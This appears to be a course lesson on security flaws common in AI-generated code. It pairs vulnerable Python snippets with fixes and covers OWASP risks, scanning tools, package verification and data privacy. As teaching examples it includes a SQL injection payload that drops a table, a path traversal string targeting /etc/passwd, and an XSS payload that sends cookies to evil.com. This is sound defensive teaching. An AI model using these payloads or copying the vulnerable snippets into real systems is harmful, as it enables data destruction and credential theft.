
Security in AI-Assisted Coding

Theory 45 min

Why Security Matters More with AI Code

AI coding assistants generate code by predicting statistically likely patterns from training data. This training data includes millions of repositories — many of which contain insecure code, outdated practices, and even known vulnerabilities.

Critical Warning

Studies show that AI-generated code contains security vulnerabilities in approximately 40% of cases when developers don't specify security requirements in their prompts. AI models optimize for functional correctness, not security by default.

Real-World Analogy

Imagine a chef trained by watching every cooking video on the internet — including ones with bad hygiene practices. The chef can make delicious-looking food, but if you don't specifically ask for food safety compliance, they might skip hand-washing. AI code generation works the same way: you must explicitly request secure coding practices.


Common Security Vulnerabilities in AI-Generated Code

1. SQL Injection

AI models frequently generate code that concatenates user input directly into SQL queries instead of using parameterized queries.

❌ Insecure (AI often generates this):

# VULNERABLE: SQL Injection
@app.get("/users")
def search_users(name: str):
    query = f"SELECT * FROM users WHERE name = '{name}'"
    result = db.execute(query)
    return result.fetchall()

# Attack: name = "'; DROP TABLE users; --"

✅ Secure (what you should require):

# SAFE: Parameterized query
from sqlalchemy import text

@app.get("/users")
def search_users(name: str):
    query = text("SELECT * FROM users WHERE name = :name")
    result = db.execute(query, {"name": name})
    return result.fetchall()

Even better with an ORM:

# SAFE: SQLAlchemy ORM
@app.get("/users")
def search_users(name: str, db: Session = Depends(get_db)):
    return db.query(User).filter(User.name == name).all()

SQL Injection is #1 for a Reason

SQL injection has topped or nearly topped web application vulnerability rankings for two decades (OWASP ranked injection #1 from 2010 through 2017, and it remains in the top three). AI models, trained on older code, frequently produce injectable queries. Always use parameterized queries or an ORM.

2. Hardcoded Secrets and Credentials

AI models often include placeholder credentials that developers forget to replace:

❌ Insecure:

# VULNERABLE: Hardcoded credentials
DATABASE_URL = "postgresql://admin:password123@db.example.com:5432/production"
API_KEY = "sk-1234567890abcdef"
JWT_SECRET = "super-secret-key"

def get_db():
    return create_engine(DATABASE_URL)

✅ Secure:

# SAFE: Environment variables
import os
from dotenv import load_dotenv

load_dotenv()

# .get() returns None when a variable is unset, so the check below can catch it
DATABASE_URL = os.environ.get("DATABASE_URL")
API_KEY = os.environ.get("API_KEY")
JWT_SECRET = os.environ.get("JWT_SECRET")

def get_db():
    if not DATABASE_URL:
        raise RuntimeError("DATABASE_URL environment variable is not set")
    return create_engine(DATABASE_URL)

3. Insecure Deserialization

AI may suggest using pickle to load untrusted data — a critical vulnerability:

❌ Insecure:

import pickle

# VULNERABLE: Loading untrusted pickle data
def load_model(file_path: str):
    with open(file_path, "rb") as f:
        return pickle.load(f)  # Can execute arbitrary code!

✅ Secure:

import joblib
import hashlib

# SAFE: Verify integrity before loading
EXPECTED_HASH = "sha256:a1b2c3d4..."

def load_model(file_path: str):
    with open(file_path, "rb") as f:
        data = f.read()

    file_hash = f"sha256:{hashlib.sha256(data).hexdigest()}"
    if file_hash != EXPECTED_HASH:
        raise ValueError("Model file integrity check failed")

    return joblib.load(file_path)

4. Path Traversal

AI-generated file handling code often doesn't validate paths:

❌ Insecure:

# VULNERABLE: Path traversal
@app.get("/files/{filename}")
def get_file(filename: str):
    file_path = f"/uploads/{filename}"
    return FileResponse(file_path)

# Attack: filename = "../../etc/passwd"

✅ Secure:

from pathlib import Path

UPLOAD_DIR = Path("/uploads").resolve()

@app.get("/files/{filename}")
def get_file(filename: str):
    safe_path = (UPLOAD_DIR / filename).resolve()

    if not safe_path.is_relative_to(UPLOAD_DIR):
        raise HTTPException(status_code=400, detail="Invalid file path")

    if not safe_path.exists():
        raise HTTPException(status_code=404, detail="File not found")

    return FileResponse(safe_path)

5. Missing Input Validation

AI often generates the "happy path" without validating inputs:

❌ Insecure:

# VULNERABLE: No input validation
@app.post("/transfer")
def transfer_money(data: dict):
    from_account = data["from"]
    to_account = data["to"]
    amount = data["amount"]

    db.execute(f"UPDATE accounts SET balance = balance - {amount} WHERE id = {from_account}")
    db.execute(f"UPDATE accounts SET balance = balance + {amount} WHERE id = {to_account}")
    return {"status": "success"}

✅ Secure:

from pydantic import BaseModel, Field, validator

class TransferRequest(BaseModel):
    from_account: int = Field(..., gt=0)
    to_account: int = Field(..., gt=0)
    amount: float = Field(..., gt=0, le=10000)

    @validator("to_account")
    def accounts_must_differ(cls, v, values):
        if "from_account" in values and v == values["from_account"]:
            raise ValueError("Cannot transfer to the same account")
        return v

@app.post("/transfer")
def transfer_money(request: TransferRequest, db: Session = Depends(get_db)):
    with db.begin():
        sender = db.query(Account).filter(Account.id == request.from_account).with_for_update().first()
        if not sender or sender.balance < request.amount:
            raise HTTPException(status_code=400, detail="Insufficient funds")

        sender.balance -= request.amount
        receiver = db.query(Account).filter(Account.id == request.to_account).with_for_update().first()
        if not receiver:
            raise HTTPException(status_code=404, detail="Receiver account not found")
        receiver.balance += request.amount

    return {"status": "success", "new_balance": sender.balance}

6. Cross-Site Scripting (XSS)

AI may generate web code that doesn't escape user input:

❌ Insecure:

# VULNERABLE: XSS via unescaped HTML
@app.get("/profile/{username}")
def show_profile(username: str):
    return HTMLResponse(f"<h1>Welcome, {username}!</h1>")

# Attack: username = "<script>document.location='http://evil.com/steal?c='+document.cookie</script>"

✅ Secure:

from markupsafe import escape

@app.get("/profile/{username}")
def show_profile(username: str):
    safe_name = escape(username)
    return HTMLResponse(f"<h1>Welcome, {safe_name}!</h1>")

OWASP Top 10 and AI-Generated Code

The OWASP Top 10 is the standard reference for web application security risks. Here's how AI-generated code intersects with each:

OWASP Risk | AI Relevance | Risk Level
A01: Broken Access Control | AI rarely generates authorization checks unless asked | 🔴 Critical
A02: Cryptographic Failures | AI may use weak algorithms (MD5, SHA1 for passwords) | 🔴 Critical
A03: Injection | SQL, NoSQL, command injection from string concatenation | 🔴 Critical
A04: Insecure Design | AI generates code, not architecture, so security design is missing | 🟡 High
A05: Security Misconfiguration | Debug mode on, default credentials, verbose errors | 🟡 High
A06: Vulnerable Components | AI may suggest outdated or vulnerable packages | 🔴 Critical
A07: Auth Failures | Weak password policies, missing rate limiting, session flaws | 🟡 High
A08: Data Integrity Failures | Insecure deserialization (pickle), missing integrity checks | 🟡 High
A09: Logging Failures | AI often omits logging; may log sensitive data when it does | 🟢 Medium
A10: SSRF | AI-generated URL fetching without validation | 🟡 High
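
A02 is worth a concrete illustration, since weak password hashing is one of the most common AI suggestions. A minimal sketch using the bcrypt package (the function names are illustrative, not from any specific codebase):

# SAFE: Slow, salted password hashing (requires `pip install bcrypt`)
import bcrypt

def hash_password(password: str) -> bytes:
    # gensalt() embeds a per-password salt and a work factor in the hash
    return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt())

def verify_password(password: str, hashed: bytes) -> bool:
    # checkpw re-hashes with the embedded salt and compares in constant time
    return bcrypt.checkpw(password.encode("utf-8"), hashed)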

Code Scanning and Security Tools

Never rely solely on manual review. Use automated tools to catch vulnerabilities:

Python-Specific Tools

Tool | What It Scans | Integration
Bandit | Python-specific security issues (eval, pickle, SQL) | CLI, CI/CD, pre-commit
Safety | Known vulnerabilities in installed packages | CLI, CI/CD
pip-audit | Package vulnerability database (PyPI) | CLI, GitHub Actions
mypy | Type errors that can lead to security issues | CLI, IDE, CI/CD

General-Purpose Tools

Tool | What It Scans | Language Support
Snyk | Dependencies + code vulnerabilities | Python, JS, Java, Go, ...
SonarQube | Code quality + security vulnerabilities | 30+ languages
Semgrep | Custom static analysis rules | Python, JS, Go, Java, ...
Trivy | Container images + IaC + filesystem | Universal
CodeQL | Deep semantic code analysis | Python, JS, Java, C/C++, Go

Example: Running Bandit on AI-Generated Code

# Install bandit
pip install bandit

# Scan a single file
bandit -r my_ai_generated_code.py

# Scan entire project with medium+ severity
bandit -r ./src -ll

# Generate a report
bandit -r ./src -f json -o security_report.json

Example Bandit output:

>> Issue: [B608:hardcoded_sql_expressions] Possible SQL injection vector
   Severity: Medium   Confidence: Low
   Location: ./api/routes.py:42
   More Info: https://bandit.readthedocs.io/en/latest/plugins/b608

41      def search_users(name: str):
42          query = f"SELECT * FROM users WHERE name = '{name}'"
43          result = db.execute(query)

Integrating Security Scanning into Your Workflow

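The simplest integration is a scan step that fails the build. A minimal sketch of such a step as shell commands (the ./src layout and requirements.txt path are assumptions about your project):

# Install the scanners
pip install bandit pip-audit

# Fail the build on medium+ severity findings in the codebase
bandit -r ./src -ll

# Fail the build if any pinned dependency has a known vulnerability
pip-audit -r requirements.txt

Both tools return a non-zero exit code when they find issues, which is what makes them usable as CI gates; the same commands also work as a pre-commit hook.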

Supply Chain Attacks

The Risk of AI-Suggested Packages

AI models can suggest packages that:

  1. Don't exist — attackers can register these names with malicious code ("dependency confusion")
  2. Are typosquats — similar names to popular packages (e.g., reqeusts vs requests)
  3. Are deprecated — no longer maintained, with known vulnerabilities
  4. Are compromised — legitimate packages whose maintainer accounts were hacked

How to Verify a Package

Before running pip install on any AI-suggested package:

# 1. Check if it exists and see metadata
pip index versions package-name

# 2. Check on PyPI website
# Visit: https://pypi.org/project/package-name/

# 3. Look at download statistics (should be high for legitimate packages)
# Visit: https://pypistats.org/packages/package-name

# 4. Check the GitHub repository linked from PyPI
# - Does it have stars?
# - When was it last updated?
# - Does the author maintain other known packages?

Real Attack: The "pytorch-nightly" Incident

In December 2022, a malicious package named torchtriton was uploaded to PyPI. It shadowed a dependency of PyTorch's nightly builds (a dependency-confusion attack), so anyone who installed PyTorch-nightly via pip during that window pulled it in. The package stole SSH keys, AWS credentials, and other sensitive files. Always verify packages before installing.

Checklist: Before Installing an AI-Suggested Package
  • Verify the package exists on PyPI
  • Check the download count (major packages have millions of downloads)
  • Verify the author/maintainer is credible
  • Check when it was last updated (avoid abandoned packages)
  • Read the GitHub README and issues
  • Check for known vulnerabilities: pip-audit or safety check
  • Compare the exact package name (watch for typosquatting)
  • Pin the version in your requirements file (see the commands after this list)
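
The vulnerability and pinning checks at the end of this list can be scripted; a hedged sketch (some-package is a placeholder name):

# Download without installing, so you can inspect the code first
pip download some-package==1.2.3 --no-deps -d /tmp/package-review

# Audit the current environment for known CVEs
pip-audit

# Pin exact versions so future installs can't silently drift
pip freeze > requirements.txt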

Data Privacy When Using AI Tools

What Data Gets Sent to AI Providers

When you use AI coding tools, your code is sent to external servers for processing:

Tool | Data Sent | Data Retention | Can Opt Out?
GitHub Copilot | Current file + context | Not used for training (Business) | Yes (Business plan)
ChatGPT | Everything you paste | May be used for training (Free) | Yes (opt out in settings)
Cursor | Files + project context | Varies by plan and model | Privacy mode available
CodeWhisperer | Current file | Not shared (Professional) | Yes

Data Privacy Risks

Never paste the following into AI chat tools:

  • API keys, passwords, or tokens
  • Customer data or PII (Personally Identifiable Information)
  • Proprietary algorithms or trade secrets
  • Internal infrastructure details (IPs, hostnames, credentials)
  • Data subject to compliance requirements (HIPAA, PCI-DSS, GDPR)

Mitigation Strategies

Strategy | Description
Use enterprise plans | Business plans typically don't train on your code
Sanitize before prompting | Replace real secrets with placeholders before pasting
Self-hosted models | Run open-source models locally (Ollama + CodeLlama, DeepSeek)
Code review policies | Require human review of all AI-generated code
DLP tools | Use Data Loss Prevention tools to detect leaked secrets

How to Sanitize Code Before Prompting

# BEFORE SENDING TO AI (your actual code):
DATABASE_URL = "postgresql://prod_admin:X7$kL9mN@db.mycompany.com:5432/customers"
STRIPE_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"

# AFTER SANITIZING (what you send to AI):
DATABASE_URL = "postgresql://user:password@hostname:5432/dbname"
STRIPE_KEY = "sk_live_XXXXXXXXXXXXXXXXXXXX"
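
Manual sanitizing is easy to forget under deadline pressure. A hedged sketch of a regex-based scrubber you could run over a snippet before pasting it (the patterns are illustrative and far from exhaustive; a real DLP tool covers many more formats):

import re

# Illustrative patterns only
SECRET_PATTERNS = [
    (re.compile(r"sk_live_[A-Za-z0-9]+"), "sk_live_XXXXXXXXXXXXXXXXXXXX"),  # Stripe live keys
    (re.compile(r"://[^/\s:]+:[^@\s]+@"), "://user:password@"),             # credentials in URLs
]

def scrub(source: str) -> str:
    # Replace anything that matches a known secret shape with a placeholder
    for pattern, replacement in SECRET_PATTERNS:
        source = pattern.sub(replacement, source)
    return source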

Intellectual Property Concerns

Key Questions for AI-Generated Code

Question | Consideration
Who owns AI-generated code? | Varies by jurisdiction; generally the developer/company
Can AI reproduce copyrighted code? | Yes; AI may reproduce GPL/AGPL code verbatim
License contamination? | If AI copies GPL code into your MIT project, you may have a problem
Patent risks? | AI may generate code that infringes on software patents

Best Practices for IP Protection

  1. Enable code reference detection — GitHub Copilot can flag when suggestions match public code
  2. Use license-aware tools — Some tools filter out suggestions from copyleft repos
  3. Document AI usage — Keep records of what was AI-generated for legal clarity
  4. Review for uniqueness — If a suggestion looks too specific, search for the source
  5. Follow your organization's AI policy — Many companies have specific guidelines

Secure Coding Checklist for AI-Generated Code

Use this comprehensive checklist every time you integrate AI-generated code:

Authentication & Authorization

  • All endpoints require authentication unless explicitly public
  • Authorization checks verify the user has permission for the specific resource
  • Passwords are hashed with bcrypt/argon2 (not MD5/SHA1)
  • JWT tokens have appropriate expiration times (sketched after this list)
  • Rate limiting is applied to auth endpoints
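
As an example of the token-expiry item, a minimal sketch using the PyJWT package (the 15-minute lifetime mirrors the prompt example later in this lesson; secret handling is assumed to follow the environment-variable pattern shown earlier):

import os
from datetime import datetime, timedelta, timezone

import jwt  # PyJWT: pip install pyjwt

JWT_SECRET = os.environ["JWT_SECRET"]

def create_access_token(user_id: int) -> str:
    # Short-lived access token; longer-lived refresh tokens are a separate concern
    payload = {
        "sub": str(user_id),
        "exp": datetime.now(timezone.utc) + timedelta(minutes=15),
    }
    return jwt.encode(payload, JWT_SECRET, algorithm="HS256")

def decode_access_token(token: str) -> dict:
    # PyJWT validates the exp claim and rejects unexpected algorithms
    return jwt.decode(token, JWT_SECRET, algorithms=["HS256"])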

Input Validation

  • All user inputs are validated (type, length, format, range)
  • SQL queries use parameterized statements or ORM
  • File paths are validated against path traversal
  • URLs are validated before fetching (SSRF prevention; see the sketch after this list)
  • HTML output is escaped to prevent XSS
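
The SSRF item is the only one not illustrated earlier, so here is a hedged sketch of a deny-by-default URL check (is_safe_url is an illustrative name; an allowlist of known hosts is stronger where feasible):

import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        # Resolve the hostname and reject private, loopback, and link-local targets
        for info in socket.getaddrinfo(parsed.hostname, None):
            ip = ipaddress.ip_address(info[4][0])
            if ip.is_private or ip.is_loopback or ip.is_link_local:
                return False
    except (socket.gaierror, ValueError):
        return False
    return True

Note that DNS answers can change between this check and the actual request (DNS rebinding), so production code should pin the resolved IP for the subsequent fetch.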

Data Protection

  • No hardcoded credentials, API keys, or secrets
  • Sensitive data is encrypted at rest and in transit
  • Logs don't contain passwords, tokens, or PII (see the sketch after this list)
  • Error messages don't leak internal implementation details
  • Database connections use TLS/SSL
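
For the logging item, a hedged sketch of a logging filter that redacts bearer tokens before records are emitted (the pattern is illustrative; extend it for your own secret formats):

import logging
import re

TOKEN_RE = re.compile(r"(Bearer\s+)[A-Za-z0-9._-]+")

class RedactingFilter(logging.Filter):
    def filter(self, record: logging.LogRecord) -> bool:
        # Rewrite the raw message; returning True keeps the record
        record.msg = TOKEN_RE.sub(r"\1[REDACTED]", str(record.msg))
        return True

handler = logging.StreamHandler()
handler.addFilter(RedactingFilter())
logging.basicConfig(level=logging.INFO, handlers=[handler])

This simplified version only touches the format string, not interpolated arguments, so treat it as a starting point rather than a guarantee.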

Dependencies

  • All packages exist on PyPI/npm and are legitimate
  • Package versions are pinned in requirements files
  • No known vulnerabilities (checked with pip-audit/safety)
  • No unnecessary dependencies (minimize attack surface)

Error Handling

  • Exceptions are caught and handled appropriately
  • Generic error messages are returned to users (no stack traces; see the sketch after this list)
  • Detailed errors are logged server-side for debugging
  • Application doesn't crash on unexpected input
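
In FastAPI, the first three items collapse into a catch-all exception handler; a minimal sketch, assuming the usual app object:

import logging

from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse

app = FastAPI()
logger = logging.getLogger("app")

@app.exception_handler(Exception)
async def unhandled_exception(request: Request, exc: Exception):
    # Full traceback goes to the server-side log only
    logger.exception("Unhandled error on %s %s", request.method, request.url.path)
    # The client gets a generic message, never a stack trace
    return JSONResponse(status_code=500, content={"detail": "Internal server error"})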

Security-Focused Prompting

To get more secure code from AI, explicitly request security in your prompts:

❌ Vague prompt (invites insecure defaults):

Write a login endpoint for FastAPI

✅ Security-focused prompt:

Write a secure login endpoint for FastAPI that:
- Uses bcrypt for password verification
- Returns JWT tokens with 15-minute expiry
- Implements rate limiting (5 attempts per minute per IP)
- Returns generic "Invalid credentials" for both wrong email and wrong password
- Logs failed attempts without logging the attempted password
- Uses constant-time comparison for password verification
- Sets secure, HTTP-only cookie flags for the token

Key Takeaways

Concept | Summary
AI security risk | ~40% of AI-generated code contains vulnerabilities when security isn't specified
Top vulnerabilities | SQL injection, hardcoded secrets, path traversal, XSS, insecure deserialization
OWASP alignment | AI code frequently triggers OWASP Top 10 categories
Scanning tools | Bandit, Snyk, SonarQube, Semgrep, pip-audit
Supply chain | Verify all AI-suggested packages before installing
Data privacy | Never paste secrets, PII, or proprietary code into AI tools
IP concerns | AI may reproduce copyrighted code; enable reference detection
Secure prompting | Explicitly request security requirements in every prompt

Further Reading